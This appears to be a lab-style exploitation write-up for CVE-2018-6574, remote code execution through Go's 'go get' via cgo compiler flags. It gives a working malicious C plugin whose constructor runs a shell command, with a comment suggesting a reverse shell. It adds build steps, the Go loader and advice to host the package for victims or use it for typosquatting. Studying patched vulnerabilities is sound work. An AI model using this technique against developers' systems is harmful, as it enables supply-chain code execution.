cve-2018-6574-rce-via-go-get
CVE-2018-6574: RCE via go get
This vulnerability impacts Golang go get command and allows an attacker to gain code execution on a system installing their malicious library. This is a good example of a vulnerability that can be exploited using typosquatting to gain code execution on developers' workstations and production systems. This vulnerability was fixed in Go 1.8.7, 1.9.4 and 1.10rc2.
The issue
The issue is due to the fact that when installing a package, Golang will build native extensions. This can be used to pass additional flags to the compiler to gain code execution. For example, CFLAGS can be used.
Exploitation
Here, we will need to host our malicious package. We need a website with TLS and a valid certificate chain. An easy way to do this is to use github.com.
Then, you will need a malicious plugin/.so file. The code below should help you with that:
attack.c
#include <stdio.h>
#include <stdlib.h>
static void malicious() __attribute__((constructor));
void malicious() {
system("touch /tmp/rezydev"); // Custom command here, maybe reverse shell or something similar!
}
You can build it using the following command:
$ gcc -shared -o attack.so -fPIC attack.c
You will need to build that plugin on the same platform and architecture as the victim: Linux 64 bit.
Finally, you need the go code that will tell cgo to use your plugin:
package main
// #cgo CFLAGS: -fplugin=./attack.so
// typedef int (*intFunc) ();
//
// int bridge_int_func(intFunc f){
// return f();
// }
//
// int fortytwo(){
// return 42;
// }
import "C"
import "fmt"
func main() {
f := C.intFunc(C.fortytwo)
fmt.Println(int(C.bridge_int_func(f)))
// Output: 42
}
Once you host your full payload on Github, you should be able to pass the package link to the victim.